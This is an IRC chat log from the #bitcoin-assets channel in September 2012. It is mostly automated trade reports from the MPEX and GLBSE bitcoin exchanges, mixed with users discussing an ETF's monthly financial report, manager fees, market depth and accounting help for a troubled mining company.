[MPEX] [S.MPOE] 11159 @ 0.00039387 = 4.3952 BTC [-] Sep 15 06:00:57 [MPEX] [O.BTCUSD.P090N] 7 @ 0.13485511 = 0.944 BTC [+] Sep 15 06:26:24 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Sep 15 06:26:56 [MPEX] [S.MPOE] 32500 @ 0.00039504 = 12.8388 BTC [+] Sep 15 06:30:45 [GLBSE] [GSDPT] 5 @ 0.0034 = 0.017 BTC [+] Sep 15 06:31:12 [GLBSE] [DI.BFLSC.FAIL] 10 @ 0.001 = 0.01 BTC [+] Sep 15 06:50:07 [MPEX] [O.BTCUSD.P080N] 8 @ 0.09569491 = 0.7656 BTC [-] Sep 15 06:50:31 [GLBSE] [PUREMINING] 6 @ 0.0889 = 0.5334 BTC [-] Sep 15 06:51:17 [GLBSE] [PUREMINING] 5 @ 0.089 = 0.445 BTC [+] Sep 15 06:54:12 mircea_popescu: Sep 15 06:54:27 with just a few minutes to spare Sep 15 06:54:29 https://bitcointalk.org/index.php?topic=67535.msg1192380#msg1192380 Sep 15 06:54:51 the MPOE.ETF financial report :D Sep 15 06:55:16 o it's that day of the month isn't it Sep 15 07:00:57 [MPEX] [O.BTCUSD.P170T] 1 @ 0.58539533 BTC [-] Sep 15 07:01:56 http://www.natursource.com/retail/tamari-almonds.htm Sep 15 07:02:08 A product I'd recommend for anyone's pantry. Sep 15 07:05:10 smickles so you sold some mpoe stock and paid back yourself whatever was left from mpex fee ? Sep 15 07:05:35 lol, no, paid back the loan for the 20 btc GLBSE fee Sep 15 07:06:39 20 btc glbse fee? Sep 15 07:06:39 [GLBSE] [GREEN] 2 @ 0.21 = 0.42 BTC [-] Sep 15 07:06:44 ya say wut ? Sep 15 07:06:45 mpoe.etf was charged 20btc to list Sep 15 07:06:51 o wait, you listed before the fee reduction uhh Sep 15 07:06:59 lol hit up nefario for a rebate :D Sep 15 07:07:17 [GLBSE] [GREEN] 5 @ 0.205 = 1.025 BTC [-] Sep 15 07:07:49 naw, i'll wait till btc are ~150 usd each for that :D Sep 15 07:08:01 lol Sep 15 07:08:24 0.31566871 wage expense, 1000% up from average, this connected ? Sep 15 07:08:37 [GLBSE] [GREEN] 3 @ 0.20010001 = 0.6003 BTC [-] Sep 15 07:08:52 um, let me have a look at that Sep 15 07:09:20 [GLBSE] [GREEN] 9 @ 0.2 = 1.8 BTC [-] Sep 15 07:09:50 [GLBSE] [SS] 2 @ 0.025 = 0.05 BTC [+] Sep 15 07:09:53 oh yeah, by the contract, wages expense is based off of real revenue Sep 15 07:10:04 o, you get a % ? Sep 15 07:10:05 holy shit Sep 15 07:10:08 .py 1570.35531024 / 1110 Sep 15 07:10:11 1.41473451373 Sep 15 07:10:13 oh Sep 15 07:10:34 i read that as <@assbot> [GLBSE] [SS] 2 @ 0.05 Sep 15 07:10:37 [GLBSE] [KRAKEN] 1 @ 0.009 BTC [-] Sep 15 07:11:52 mircea_popescu: yeah, for running it, i take a 1% cut Sep 15 07:12:18 aha yeah. cool. Sep 15 07:12:27 you almost made a cuppa coffee this month :D Sep 15 07:12:50 i guess the going rate has gone up since i started it (as deadterra is taking 5%) Sep 15 07:13:48 he's taking 5% of dividends tho Sep 15 07:14:13 it's basically the same thing because he doesn't buy/sell the underlying Sep 15 07:14:28 i take a smaller cut for doing more work Sep 15 07:14:48 well wait, you take 1% of what, nav ? Sep 15 07:14:57 real revenue Sep 15 07:15:05 as in, dividends + share appreciation ? Sep 15 07:15:20 dividends and share sales Sep 15 07:15:26 aha Sep 15 07:15:32 o incidentally, Cash payments for purchase of MPOE stock.. 1.00016000 Sep 15 07:15:41 you bought stock but your stake seems to have diminished ? Sep 15 07:15:47 or my recollection is off Sep 15 07:16:00 bought less than sold in total Sep 15 07:16:15 ah Sep 15 07:16:27 that was a purchase i arranged at .00028 Sep 15 07:16:40 you bought at 28 ?! Sep 15 07:16:45 :) Sep 15 07:16:49 lol juciy. Sep 15 07:17:12 how did you manage that lol, buy me some too Sep 15 07:17:12 [GLBSE] [ASICMINER] 20 @ 0.114 = 2.28 BTC [-] Sep 15 07:17:23 [GLBSE] [KRAKEN] 1989 @ 0.009 = 17.901 BTC [-] Sep 15 07:17:27 heh, buy shares in the fund :D Sep 15 07:17:30 ahahah Sep 15 07:17:40 but pretty cool stuff. 6 months old now too Sep 15 07:17:46 halfway to first dividend report. Sep 15 07:17:48 [GLBSE] [FDBF] 20 @ 0.15 = 3 BTC [+] Sep 15 07:18:16 [GLBSE] [GIGAMINING] 1 @ 0.66999999 BTC [+] Sep 15 07:18:27 !ticker s.mpoe Sep 15 07:18:28 [MPEX:S.MPOE] 1day: 0.00039314 / 0.00039577 / 0.00039885 (1217705 shares, 481.94 BTC), 30day: 0.000035 / 0.00038514 / 0.00042 (78081787 shares, 30,073.15 BTC) Sep 15 07:18:36 .py 64849 * 0.00039577 Sep 15 07:18:37 25.66528873 Sep 15 07:18:59 so wait. if you're net - 65k yo should have 25 a yes you do Sep 15 07:19:15 jesus this is painstakingly detailed man. Sep 15 07:19:18 [GLBSE] [COGNITIVE] 5 @ 0.4999 = 2.4995 BTC [-] Sep 15 07:19:26 how long do you take to make them ? coupla hours ? more ? Sep 15 07:20:35 !ticker mpoe.etf Sep 15 07:20:40 [GLBSE:MPOE.ETF] [Bid: 0.00180181] [Ask: 1.34] [Spread: 1.33819819] [Last: 1.35] [24hVol: ] [7dAvg: ] Sep 15 07:20:55 heh. impressive how inclined to recognize value glbbq is. Sep 15 07:21:06 the reports? yeah, couple of hours at the most Sep 15 07:21:19 well, they're certainly setting a standard. Sep 15 07:21:46 speaking of standards, do you find yourself inclined to step into the dmc mess ? Sep 15 07:22:41 I buy DMC shares by the way, if anyone is dumping them Sep 15 07:23:32 BTC-Mining they're not really worth more than 0.049 iirc ? Sep 15 07:23:49 mircea_popescu: in what capacity? Sep 15 07:24:25 well, they've completely fubar'd it beyond recognition, nefario and diablo. now they pretty much need a 3rd party that's not reputed mentally deficient / 3 years old Sep 15 07:24:44 and they have to have an epic beard as well Sep 15 07:24:45 to pick up the pieces, make a statement abotu what the situation is, do the accountign etc Sep 15 07:25:15 I have a poor idea of their current NAV value. Sep 15 07:25:25 But I'll buy them if they're cheap enough Sep 15 07:25:32 BTC-Mining i recall somebody working it out somewhere but i think the holdings were sligjhtly outdated at the time Sep 15 07:26:21 smickles iirc Diablo-D3 was asking for you to be that 3rd party. Sep 15 07:26:34 i think someone should pay smickles Sep 15 07:26:44 if that is the case Sep 15 07:27:15 i think so too, but i wouldn't imagine that'll muchly happen Sep 15 07:27:26 I'll pay him in food. Is that ok with you smickles? Sep 15 07:27:51 lol, i'd throw some btc dust into the pot if it makes the drama stop Sep 15 07:28:00 it's becoming a public nuisance. Sep 15 07:28:03 glbse accountant on retainer Sep 15 07:28:28 [GLBSE] [TYGRR.BOND-A] 1 @ 0.115 BTC [-] Sep 15 07:28:56 [MPEX] [S.MPOE] 19085 @ 0.00039504 = 7.5393 BTC [+] Sep 15 07:28:58 [MPEX] [S.MPOE] 5066 @ 0.00039538 = 2.003 BTC [+] Sep 15 07:28:59 [MPEX] [S.MPOE] 20700 @ 0.00039711 = 8.2202 BTC [+] Sep 15 07:29:00 [MPEX] [S.MPOE] 5749 @ 0.00039737 = 2.2845 BTC [+] Sep 15 07:34:51 mircea_popescu: yes, I'd rather have smickles as one of them Sep 15 07:37:08 [GLBSE] [SS] 3 @ 0.025 = 0.075 BTC [+] Sep 15 07:37:50 [GLBSE] [KRAKEN] 2 @ 0.00999999 = 0.02 BTC [+] Sep 15 07:38:27 well, i could probably do something to help out :) Sep 15 07:39:24 It seems to me that something is brewing in the community to work on these sort of issues Sep 15 07:40:26 yeah. it finally dawns on glbbq, a year later, that maybe being a little more like mpex in this respect too wouldn't be a bad thing. Sep 15 07:41:25 Obsi: i have a beard, but i should not be the one to judge wether it be epic or epyllion Sep 15 07:41:57 mircea_popescu can give you tips on making it epic I'm sure Sep 15 07:42:32 obsi you have some pent up something you want to share ? Sep 15 07:42:42 I want to tickle your beard Sep 15 07:42:50 [GLBSE] [GIGAMINING] 1 @ 0.66999999 BTC [+] Sep 15 07:42:58 lol. currently im shaved tho. Sep 15 07:43:12 it was an epic beard Sep 15 07:43:43 it does grow back east enough Sep 15 07:46:00 aw, why do i leave /away on :( Sep 15 07:49:45 smickles: btw, you run a bitcoin accounting company, right? Sep 15 07:50:59 ya, smickles, michael & carver. Sep 15 07:51:28 fee chart noaw Sep 15 07:52:15 [GLBSE] [DMC] 10 @ 0.05999989 = 0.6 BTC [+] Sep 15 07:54:56 [MPEX] [S.MPOE] 7151 @ 0.00039737 = 2.8416 BTC [+] Sep 15 07:54:57 [MPEX] [S.MPOE] 27500 @ 0.0003974 = 10.9285 BTC [+] Sep 15 07:54:59 [MPEX] [S.MPOE] 10303 @ 0.00039817 = 4.1023 BTC [+] Sep 15 07:59:15 Diablo-D3: i don't run accounting company. however, I am strongly considering it once i move to arizona and learn that stat's accounting regulations,licences, etc Sep 15 08:00:11 usagi: that'd be great as long as you arent on the board of it Sep 15 08:00:22 what we need is more smickleses Sep 15 08:00:37 what, we can clone him Sep 15 08:00:45 with free solar power Sep 15 08:01:25 smickles: how much would you charge DMC to handle stuff? Sep 15 08:02:55 usagi: you need an odd number. Sep 15 08:04:06 [GLBSE] [OBSI.HRPT] 205 @ 0.1 = 20.5 BTC [+] Sep 15 08:05:30 maybe. Sep 15 08:05:56 fine, its probably the only way to keep it honest. Sep 15 08:05:56 [MPEX] [S.BVPS] 1200 @ 0.003 = 3.6 BTC [-] Sep 15 08:14:56 [MPEX] [S.BVPS] 800 @ 0.00337901 = 2.7032 BTC [+] Sep 15 08:16:20 https://bitcointalk.org/index.php?topic=109660.0 Sep 15 08:16:22 heh Sep 15 08:17:43 o hey, theymos admits owning part of glbse publicly ? Sep 15 08:18:12 oh what Sep 15 08:18:15 seriously? Sep 15 08:18:18 CANT TRUST ANYONE, WARGH Sep 15 08:18:33 i thought it's big secret bla bla. Sep 15 08:20:10 all you base are belong to theymos Sep 15 08:21:16 yay! it's back! http://bit.ly/RMjqah … hmm, how long has that island been there? Sep 15 08:21:42 <[\\\]> I'm not on it Sep 15 08:21:45 <[\\\]> sad panda Sep 15 08:22:08 o hey, it's back Sep 15 08:22:21 [\\\] well it's cause you don't talk to people. but it's fixed nao. Sep 15 08:22:36 I AM NOT IN THE CENTER Sep 15 08:22:39 THIS GRAPH IS WRONG Sep 15 08:23:39 you were suspended from center too ? Sep 15 08:23:51 damn mircea_popescu , you and assbot have a thik rod together Sep 15 08:24:16 thickest on the map. i have no ideea why either Sep 15 08:24:50 ;;lastseen hashking Sep 15 08:24:51 Error: "lastseen" is not a valid command. Sep 15 08:24:55 ;;seen hashking Sep 15 08:24:56 hashking was last seen in #bitcoin-assets 6 days, 14 hours, 42 minutes, and 25 seconds ago: hi Sep 15 08:24:59 wow srsly ? Sep 15 08:25:03 you seem to be the nexus Sep 15 08:25:16 the guy was here and said hi ? wtf happened next? Sep 15 08:25:39 ;;seen BTCHero Sep 15 08:25:40 BTCHero was last seen in #bitcoin-assets 5 days, 1 hour, 20 minutes, and 29 seconds ago: slow night i guess Sep 15 08:26:03 i'd like that to answer your question Sep 15 08:26:26 go ahead ? Sep 15 08:27:03 was hashking ever all that talkitive in here? Sep 15 08:27:16 this may be his first foray Sep 15 08:32:40 I dunno though Sep 15 08:33:12 maybe I should start another company Sep 15 08:33:22 one to mine in space. Sep 15 08:33:35 nefario cant take the assets if they're in orbit. Sep 15 08:33:43 prolly the better avenue for you would be to find employment with some established company. Sep 15 08:33:59 and i don't mean no forum play-pretend bullshit "companies" either. Sep 15 08:38:00 Diablo-D3: would you just need bookkeeping or would you need reports too? Sep 15 08:38:09 [GLBSE] [ASICMINER] 60 @ 0.114 = 6.84 BTC [-] Sep 15 08:38:53 [GLBSE] [FUTUREFUND] 5 @ 0.00012682 = 0.0006 BTC [+] Sep 15 08:39:12 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 15 08:40:09 [MPEX] [S.MPOE] 832 @ 0.00039387 = 0.3277 BTC [-] Sep 15 08:40:10 [MPEX] [S.MPOE] 15800 @ 0.00039366 = 6.2198 BTC [-] Sep 15 08:40:12 [MPEX] [S.MPOE] 38550 @ 0.00039302 = 15.1509 BTC [-] Sep 15 08:40:13 [MPEX] [S.MPOE] 2818 @ 0.00039288 = 1.1071 BTC [-] Sep 15 08:41:57 [GLBSE] [FPGAMINING] 1 @ 0.611 BTC [+] Sep 15 08:42:20 [GLBSE] [PUREMINING] 1 @ 0.08820001 BTC [-] Sep 15 08:44:55 [MPEX] [S.MPOE] 9282 @ 0.00039288 = 3.6467 BTC [-] Sep 15 08:44:56 [MPEX] [S.MPOE] 47200 @ 0.00039281 = 18.5406 BTC [-] Sep 15 08:44:58 [MPEX] [S.MPOE] 49421 @ 0.00039269 = 19.4071 BTC [-] Sep 15 08:44:59 [MPEX] [S.MPOE] 55715 @ 0.00039266 = 21.8771 BTC [-] Sep 15 08:45:00 [MPEX] [S.MPOE] 3878 @ 0.0003926 = 1.5225 BTC [-] Sep 15 08:45:01 [MPEX] [S.MPOE] 46200 @ 0.0003926 = 18.1381 BTC [-] Sep 15 08:45:01 [MPEX] [S.MPOE] 9342 @ 0.00039257 = 3.6674 BTC [-] Sep 15 08:45:02 [MPEX] [S.MPOE] 63700 @ 0.00039245 = 24.9991 BTC [-] Sep 15 08:45:04 [MPEX] [S.MPOE] 22200 @ 0.00039242 = 8.7117 BTC [-] Sep 15 08:45:05 [MPEX] [S.MPOE] 20607 @ 0.00039239 = 8.086 BTC [-] Sep 15 08:45:06 [MPEX] [S.MPOE] 60800 @ 0.00039235 = 23.8549 BTC [-] Sep 15 08:45:07 [MPEX] [S.MPOE] 37658 @ 0.00039229 = 14.7729 BTC [-] Sep 15 08:45:08 [MPEX] [S.MPOE] 62359 @ 0.00039224 = 24.4597 BTC [-] Sep 15 08:45:09 [MPEX] [S.MPOE] 33296 @ 0.00039219 = 13.0584 BTC [-] Sep 15 08:45:10 [MPEX] [S.MPOE] 48900 @ 0.00039215 = 19.1761 BTC [-] Sep 15 08:45:11 [MPEX] [S.MPOE] 7900 @ 0.00039214 = 3.0979 BTC [-] Sep 15 08:45:11 [MPEX] [S.MPOE] 13500 @ 0.00039207 = 5.2929 BTC [-] Sep 15 08:45:12 [MPEX] [S.MPOE] 9700 @ 0.00039201 = 3.8025 BTC [-] Sep 15 08:45:13 [MPEX] [S.MPOE] 46600 @ 0.000392 = 18.2672 BTC [-] Sep 15 08:45:14 [MPEX] [S.MPOE] 35200 @ 0.00039196 = 13.797 BTC [-] Sep 15 08:45:15 [MPEX] [S.MPOE] 41100 @ 0.00039189 = 16.1067 BTC [-] Sep 15 08:45:16 [MPEX] [S.MPOE] 29600 @ 0.00039188 = 11.5996 BTC [-] Sep 15 08:45:18 [MPEX] [S.MPOE] 28000 @ 0.00039186 = 10.9721 BTC [-] Sep 15 08:45:19 [MPEX] [S.MPOE] 52603 @ 0.00039184 = 20.612 BTC [-] Sep 15 08:45:20 [MPEX] [S.MPOE] 53932 @ 0.0003917 = 21.1252 BTC [-] Sep 15 08:45:20 [MPEX] [S.MPOE] 17578 @ 0.00039169 = 6.8851 BTC [-] Sep 15 08:45:21 [MPEX] [S.MPOE] 8400 @ 0.00039169 = 3.2902 BTC [-] Sep 15 08:45:22 [MPEX] [S.MPOE] 38900 @ 0.00039168 = 15.2364 BTC [-] Sep 15 08:45:23 [MPEX] [S.MPOE] 20900 @ 0.00039163 = 8.1851 BTC [-] Sep 15 08:45:24 [MPEX] [S.MPOE] 25200 @ 0.0003916 = 9.8683 BTC [-] Sep 15 08:45:25 [MPEX] [S.MPOE] 58641 @ 0.00039155 = 22.9609 BTC [-] Sep 15 08:45:26 [MPEX] [S.MPOE] 17500 @ 0.00039153 = 6.8518 BTC [-] Sep 15 08:45:27 [MPEX] [S.MPOE] 33800 @ 0.00039152 = 13.2334 BTC [-] Sep 15 08:45:28 [MPEX] [S.MPOE] 24800 @ 0.0003915 = 9.7092 BTC [-] Sep 15 08:45:28 omg ? Sep 15 08:45:29 [MPEX] [S.MPOE] 15018 @ 0.00039145 = 5.8788 BTC [-] Sep 15 08:45:30 [MPEX] [S.MPOE] 61500 @ 0.00039141 = 24.0717 BTC [-] Sep 15 08:45:30 [MPEX] [S.MPOE] 7000 @ 0.0003914 = 2.7398 BTC [-] Sep 15 08:45:31 [MPEX] [S.MPOE] 25100 @ 0.00039139 = 9.8239 BTC [-] Sep 15 08:45:32 [MPEX] [S.MPOE] 32087 @ 0.0003913 = 12.5556 BTC [-] Sep 15 08:45:33 [MPEX] [S.MPOE] 2800 @ 0.00039123 = 1.0954 BTC [-] Sep 15 08:45:34 [MPEX] [S.MPOE] 57991 @ 0.00039122 = 22.6872 BTC [-] Sep 15 08:45:35 [MPEX] [S.MPOE] 22500 @ 0.00039111 = 8.8 BTC [-] Sep 15 08:45:36 [MPEX] [S.MPOE] 52796 @ 0.00039101 = 20.6438 BTC [-] Sep 15 08:45:37 i call 38 Sep 15 08:45:37 [MPEX] [S.MPOE] 16600 @ 0.000391 = 6.4906 BTC [-] Sep 15 08:45:38 [MPEX] [S.MPOE] 38400 @ 0.00039096 = 15.0129 BTC [-] Sep 15 08:45:39 [MPEX] [S.MPOE] 21200 @ 0.00039093 = 8.2877 BTC [-] Sep 15 08:45:40 [MPEX] [S.MPOE] 4900 @ 0.00039088 = 1.9153 BTC [-] Sep 15 08:45:41 [MPEX] [S.MPOE] 31444 @ 0.00039082 = 12.2889 BTC [-] Sep 15 08:45:42 [MPEX] [S.MPOE] 49547 @ 0.00039075 = 19.3605 BTC [-] Sep 15 08:45:43 [MPEX] [S.MPOE] 26400 @ 0.00039069 = 10.3142 BTC [-] Sep 15 08:45:43 whay! Sep 15 08:45:44 [MPEX] [S.MPOE] 17710 @ 0.00039065 = 6.9184 BTC [-] Sep 15 08:45:45 [MPEX] [S.MPOE] 7301 @ 0.00039055 = 2.8514 BTC [-] Sep 15 08:45:46 [MPEX] [S.MPOE] 29300 @ 0.00039053 = 11.4425 BTC [-] Sep 15 08:45:47 [MPEX] [S.MPOE] 27726 @ 0.00039036 = 10.8231 BTC [-] Sep 15 08:45:48 [MPEX] [S.MPOE] 21900 @ 0.00039036 = 8.5489 BTC [-] Sep 15 08:45:49 [MPEX] [S.MPOE] 31400 @ 0.00039036 = 12.2573 BTC [-] Sep 15 08:45:50 [MPEX] [S.MPOE] 57339 @ 0.00039033 = 22.3811 BTC [-] Sep 15 08:45:51 [MPEX] [S.MPOE] 20700 @ 0.00039026 = 8.0784 BTC [-] Sep 15 08:45:52 [MPEX] [S.MPOE] 24020 @ 0.00039023 = 9.3733 BTC [-] Sep 15 08:45:53 [MPEX] [S.MPOE] 16300 @ 0.00039018 = 6.3599 BTC [-] Sep 15 08:45:54 [MPEX] [S.MPOE] 320 @ 0.00039017 = 0.1249 BTC [-] Sep 15 08:45:55 [MPEX] [S.MPOE] 47600 @ 0.00039015 = 18.5711 BTC [-] Sep 15 08:45:56 [MPEX] [S.MPOE] 32400 @ 0.00039015 = 12.6409 BTC [-] Sep 15 08:45:57 [MPEX] [S.MPOE] 49800 @ 0.00038991 = 19.4175 BTC [-] Sep 15 08:45:58 [MPEX] [S.MPOE] 11800 @ 0.00038988 = 4.6006 BTC [-] Sep 15 08:45:59 [MPEX] [S.MPOE] 4689 @ 0.00038986 = 1.8281 BTC [-] Sep 15 08:46:10 hey, you called it. Sep 15 08:46:19 :) Sep 15 08:46:26 that was a good call Sep 15 08:46:30 lol did you just dump mpoe.etf holdings ? Sep 15 08:46:49 omg i can't believe this Sep 15 08:47:11 .py ( 0.00039288 - 0.00038986) / 0.00038986 * 100 Sep 15 08:47:14 0.774637049197 Sep 15 08:47:24 this is the new definition of solid. Sep 15 08:47:32 [GLBSE] [007] 3 @ 0.09 = 0.27 BTC [+] Sep 15 08:47:34 [GLBSE] [007] 2 @ 0.09 = 0.18 BTC [+] Sep 15 08:47:53 hundreds of btcs sold, < 1% price drop Sep 15 08:48:15 naw, mpoeetf still has all the shares it had a moment ago Sep 15 08:49:26 well sbdy dumped Sep 15 08:49:46 inb4 fake trades Sep 15 08:50:27 right-o Sep 15 08:50:32 who was it saying all the small value trades were suspicious? Sep 15 08:50:46 lol define small value Sep 15 08:51:08 <1btc, i think. maybe less than 5 Sep 15 08:51:51 lol funny cause i just re-read the list, there's nothing < 1 Sep 15 08:51:59 i.e., a chain of sub-0.01 trades totalling less than 1btc Sep 15 08:52:43 well i certainly like to see this depth hold and grow Sep 15 08:53:10 nothing compred to mtgox depths yet, but we have hope. Sep 15 08:55:56 :] Sep 15 08:57:36 well, there's a good hard-looking wall at .00035 it seems Sep 15 08:58:37 about 370ish btc around there Sep 15 08:59:12 yea Sep 15 08:59:34 and well over a hundred btc until that even gets touched Sep 15 09:00:09 well something like 500 or maybe even 1 k just got extracted Sep 15 09:00:31 s.dice seems to have about the same 500 depth Sep 15 09:00:47 i nthe end these aren't really too big if one thinks in terms of nyse stocks really Sep 15 09:00:55 but i'd guess for btc it is pretty darn good. Sep 15 09:02:09 what would a 1kbtc sell do to giga? Sep 15 09:02:31 -mrmist- [Global Notice] - Hi everyone. As you may have noticed our services (nickserv, chanserv etc.) have broken again. We're busy running around like headless chickens to get them back for you. freenode staff are around to help if there are emergency channel situations. Thanks for flying freenode! Sep 15 09:03:05 looks like wipe the board Sep 15 09:03:08 i dunno Sep 15 09:03:29 .py 100000*0.00023000 Sep 15 09:03:30 23.0 Sep 15 09:03:35 ya even 500'd wipe Sep 15 09:03:40 tho it;'s been sold to all hell actually Sep 15 09:03:44 !ticker f.giga.etf Sep 15 09:03:46 [MPEX:F.GIGA.ETF] 1day: 0.000415 / 0.00042972 / 0.00047591 (118600 shares, 50.96 BTC), 30day: 0.00030644 / 0.0007656 / 0.00113797 (13928824 shares, 10,664.02 BTC) Sep 15 09:04:06 it's been realy sold off massively, for whatever reason Sep 15 09:04:23 looks pretty distressed. Sep 15 09:04:29 huh, looking at glbse, there's tabs of 'bluemarket whitemarket pinkmarket blackmarket' Sep 15 09:04:36 wonder what that's about Sep 15 09:05:14 whatever reason? it's a fixed hash 'bond' isn't it? Sep 15 09:05:16 well, glbse has to continually "reinvent" itself to distract people from the fact that pretty much any money they put in there is lost. Sep 15 09:05:33 smickles ya but it took an abrupt beating this week Sep 15 09:06:16 ah, it's categories of quality ostensibly Sep 15 09:06:29 black has all the ppt's and such Sep 15 09:07:02 right. had a bunch of scammy/failed stocks, made version 2.0. in due time this got filled with scammy/failed stocks so now makes colors Sep 15 09:07:04 then 3.0 Sep 15 09:07:05 then etc. Sep 15 09:07:10 [GLBSE] [GSDPT] 882 @ 0.0034 = 2.9988 BTC [+] Sep 15 09:08:03 [01:38:07] Diablo-D3: would you just need bookkeeping or would you need reports too? Sep 15 09:08:13 smickles: its the reports I suck at Sep 15 09:08:20 mircea_popescu: btw, you missed that I was telling a joke Sep 15 09:11:55 [MPEX] [S.MPOE] 15033 @ 0.00039715 = 5.9704 BTC [+] Sep 15 09:14:59 Diablo-D3: i'm considering offering services at ~6 btc an hour. if you keep double entry books, i could probably make your reports in one hour Sep 15 09:16:08 guh. Sep 15 09:17:33 but this would have to wait until i finish moving Sep 15 09:17:52 i should be done with that after oct 1 Sep 15 09:18:06 this would have to wait until dmc can afford that Sep 15 09:19:06 I swear Ive had this conversation before Sep 15 09:19:25 *insert joke; form: 'how much can you afford?' cabbie takes the money, drives one block Sep 15 09:22:48 smickles: its the reports I suck at << this is very true. i would guess the entire thing could have been avoided with some well written reports. Sep 15 09:23:50 people kept asking for reports, not getting them, eventually it turned into a lynch mob. Sep 15 09:25:11 Diablo-D3: you really think 6 btc is too much? bean counting is a professional service Sep 15 09:26:23 smickles: our best month ever paid like 40btc dividends Sep 15 09:26:49 ya this is the problem of btc really. both of you have a point. Sep 15 09:33:57 ;;ticker Sep 15 09:33:59 Best bid: 11.6322, Best ask: 11.7, Bid-ask spread: 0.06780, Last trade: 11.63214, 24 hour volume: 36438, 24 hour low: 11.41502, 24 hour high: 11.799 Sep 15 09:34:11 ;;bc,24hprc Sep 15 09:34:13 11.62 Sep 15 09:38:55 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.30131631 = 301.3163 BTC [+] Sep 15 09:38:57 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.39115708 = 391.1571 BTC [+] Sep 15 09:43:55 [MPEX] [O.BTCUSD.C080T] 220 @ 0.39114219 = 86.0513 BTC [-] Sep 15 09:43:56 [MPEX] [O.BTCUSD.C090T] 480 @ 0.30129138 = 144.6199 BTC [-] Sep 15 09:44:41 wow. Sep 15 09:44:59 smickles, usagi: it may be entirely possible the entire community is full of nutjobs Sep 15 09:47:55 [MPEX] [F.GIGA.ETF] 30383 @ 0.00047591 = 14.4596 BTC [+] Sep 15 09:47:56 [MPEX] [F.GIGA.ETF] 19617 @ 0.000485 = 9.5142 BTC [+] Sep 15 09:48:50 https://bitcointalk.org/index.php?topic=77469.msg1192323#msg1192323 Sep 15 09:48:53 thats insane! Sep 15 09:54:39 [GLBSE] [ASICMINER] 10 @ 0.112 = 1.12 BTC [-] **** BEGIN LOGGING AT Sat Sep 15 22:15:27 2012 Sep 15 22:15:46 planned. Sep 15 22:16:40 [GLBSE] [OBSI.HRPT] 1 @ 0.0999 BTC [+] Sep 15 22:24:18 ;;ticker Sep 15 22:24:19 Best bid: 11.69, Best ask: 11.75, Bid-ask spread: 0.06000, Last trade: 11.75, 24 hour volume: 18477, 24 hour low: 11.6, 24 hour high: 11.78991 Sep 15 22:25:03 [MPEX] [S.MPOE] 70400 @ 0.00035 = 24.64 BTC [-] Sep 15 22:25:58 [GLBSE] [NYAN.B] 9 @ 0.99 = 8.91 BTC [+] Sep 15 22:27:55 [GLBSE] [OBSI.HRPT] 25 @ 0.0999 = 2.4975 BTC [+] Sep 15 22:29:54 [MPEX] [S.MPOE] 6329 @ 0.00035061 = 2.219 BTC [+] Sep 15 22:29:56 [MPEX] [S.MPOE] 46324 @ 0.00039699 = 18.3902 BTC [+] Sep 15 22:29:57 [MPEX] [S.MPOE] 47347 @ 0.0003971 = 18.8015 BTC [+] Sep 15 22:35:37 [GLBSE] [MU] 1 @ 0.3 BTC [+] Sep 15 22:36:34 [GLBSE] [FDBF] 4 @ 0.15 = 0.6 BTC [+] Sep 15 22:37:19 [GLBSE] [UDN] 1 @ 0.04998999 BTC [-] Sep 15 22:37:20 [GLBSE] [UDN] 1 @ 0.04999 BTC [+] Sep 15 22:38:50 [GLBSE] [PPT.E] 130 @ 0.32 = 41.6 BTC [-] Sep 15 22:40:40 [GLBSE] [OBSI.HRPT] 57 @ 0.0999 = 5.6943 BTC [+] Sep 15 22:40:42 [GLBSE] [OBSI.HRPT] 343 @ 0.1 = 34.3 BTC [+] Sep 15 22:41:13 [GLBSE] [TYGRR.BOND-P] 45 @ 0.03158745 = 1.4214 BTC [-] Sep 15 22:41:14 [GLBSE] [TYGRR.BOND-P] 1 @ 0.03144282 BTC [-] Sep 15 22:41:16 [GLBSE] [TYGRR.BOND-P] 1 @ 0.03117194 BTC [-] Sep 15 22:41:17 [GLBSE] [TYGRR.BOND-P] 14 @ 0.0310594 = 0.4348 BTC [-] Sep 15 22:41:18 [GLBSE] [TYGRR.BOND-P] 2 @ 0.03090401 = 0.0618 BTC [-] Sep 15 22:41:19 [GLBSE] [TYGRR.BOND-P] 3 @ 0.03077875 = 0.0923 BTC [-] Sep 15 22:41:20 [GLBSE] [TYGRR.BOND-P] 7 @ 0.03065739 = 0.2146 BTC [-] Sep 15 22:41:21 [GLBSE] [TYGRR.BOND-P] 1 @ 0.03051631 BTC [-] Sep 15 22:41:22 [GLBSE] [TYGRR.BOND-P] 1 @ 0.03031472 BTC [-] Sep 15 22:41:23 [GLBSE] [TYGRR.BOND-P] 1 @ 0.030279 BTC [-] Sep 15 22:41:24 [GLBSE] [TYGRR.BOND-P] 109 @ 0.03 = 3.27 BTC [-] Sep 15 22:41:25 [GLBSE] [TYGRR.BOND-P] 15 @ 0.0261 = 0.3915 BTC [-] Sep 15 22:42:03 [MPEX] [S.MPOE] 23653 @ 0.0003971 = 9.3926 BTC [+] Sep 15 22:42:05 [MPEX] [S.MPOE] 2120 @ 0.00039711 = 0.8419 BTC [+] Sep 15 22:42:05 [MPEX] [S.MPOE] 9647 @ 0.00039817 = 3.8411 BTC [+] Sep 15 22:42:06 [MPEX] [S.MPOE] 25000 @ 0.0003985 = 9.9625 BTC [+] Sep 15 22:42:07 [MPEX] [S.MPOE] 3724 @ 0.00039885 = 1.4853 BTC [+] Sep 15 22:42:09 [MPEX] [S.MPOE] 15100 @ 0.0003989 = 6.0234 BTC [+] Sep 15 22:42:10 [MPEX] [S.MPOE] 59309 @ 0.00039898 = 23.6631 BTC [+] Sep 15 22:42:11 [MPEX] [S.MPOE] 51200 @ 0.00039938 = 20.4483 BTC [+] Sep 15 22:42:12 [MPEX] [S.MPOE] 1300 @ 0.00039941 = 0.5192 BTC [+] Sep 15 22:42:13 [MPEX] [S.MPOE] 13569 @ 0.00039997 = 5.4272 BTC [+] Sep 15 22:42:14 [MPEX] [S.MPOE] 25000 @ 0.00039999 = 9.9998 BTC [+] Sep 15 22:42:15 [MPEX] [S.MPOE] 56147 @ 0.00040062 = 22.4936 BTC [+] Sep 15 22:42:15 [MPEX] [S.MPOE] 17200 @ 0.00040063 = 6.8908 BTC [+] Sep 15 22:42:17 [MPEX] [S.MPOE] 57000 @ 0.00040108 = 22.8616 BTC [+] Sep 15 22:42:18 [MPEX] [S.MPOE] 4200 @ 0.00040112 = 